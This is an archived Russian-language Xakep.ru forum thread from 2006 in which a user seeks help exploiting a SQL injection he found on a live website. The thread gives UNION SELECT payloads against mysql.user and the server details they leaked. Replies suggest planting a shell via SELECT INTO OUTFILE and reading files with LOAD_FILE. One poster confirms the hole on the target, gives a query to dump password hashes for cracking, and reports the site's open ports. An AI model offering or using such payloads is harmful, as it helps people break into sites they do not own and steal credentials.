Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

SQL Inj

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> SQL Inj
Имя
Сообщение << Старые топики   Новые топики >>
SQL Inj - 2006-10-21 19:56:04.163333   
Solker

Сообщений: 13
Оценки: 0
Присоединился: 2005-04-15 12:33:47
 Вот порыл тут сайт один, нашел там что то похожее не инжектион но, ошибку саму он не выдает но инжектион проходит.
Пишу вот это:
http://www.site.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1%20UNION%20select%201,2,3,4%20from%20mysql.user/*

Он мне выводит
3
4

Вообщем вот что узнал

User admin@wizard.dataforce.net
database am-group
version 4.0.18-1.gm-log
user admin

Пишу
http://www.site.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1%20UNION%20select%201,2,password,4%20from%20mysql.user/*

так он мне ничего не выдает… просто пусто, не знаю что делать.

Подскажите что дальше делать чтоль…
Post #: 1
RE: SQL Inj - 2006-10-21 20:34:00.850000   
Сhaos_Сode

Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
 попробуй загрузить шелл(load into output file), прочитать файл конфига(LOAD_FILE(), у MySQL богатые возможности, если конечно это не запрещено. Какие точно составить запрос не скажу. Чтоб сам учился.  еще возможно придется юзать char() и перекодировать адреса файлов в 16ю кодировку. Это может быть нужно для LOAD_FILE. С 1-м бывает чертовски необходимо но не работает.
Post #: 2
RE: SQL Inj - 2006-10-21 22:20:00.443333   
Solker

Сообщений: 13
Оценки: 0
Присоединился: 2005-04-15 12:33:47
 >попробуй загрузить шелл(load into output file)

Я что то на сайте мускула в мануле не смог найти ничего по Load into.

>Lodas_File но я же ведь не знаю полный путь… это раз.
А чтоб перекодировать ее я понимаю это надо перекодировать в что то типа 0x123jd73d73…?
Post #: 3
RE: SQL Inj - 2006-10-21 22:22:17.446666   
AdReNaL1Ne

Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
 Не Load into а select into
Post #: 4
RE: SQL Inj - 2006-10-21 23:47:49.633333   
Dimonelite

Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
 зашел на тот сайт, посмотрел, sql-injection действительно есть. пиши union select 1,2,user,password from mysql.user LIMIT 0,1 потом LIMIT 1,1. возьмешь хеш юзера admin, расшифруешь, и может быть он куда-нибудь подойдет. порт mysql фильтруется, как и все остальные кроме 80,443,8080, везде висит апач
Post #: 5
Страниц:  [1]
Все форумы >> [В Сети] >> SQL Inj







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.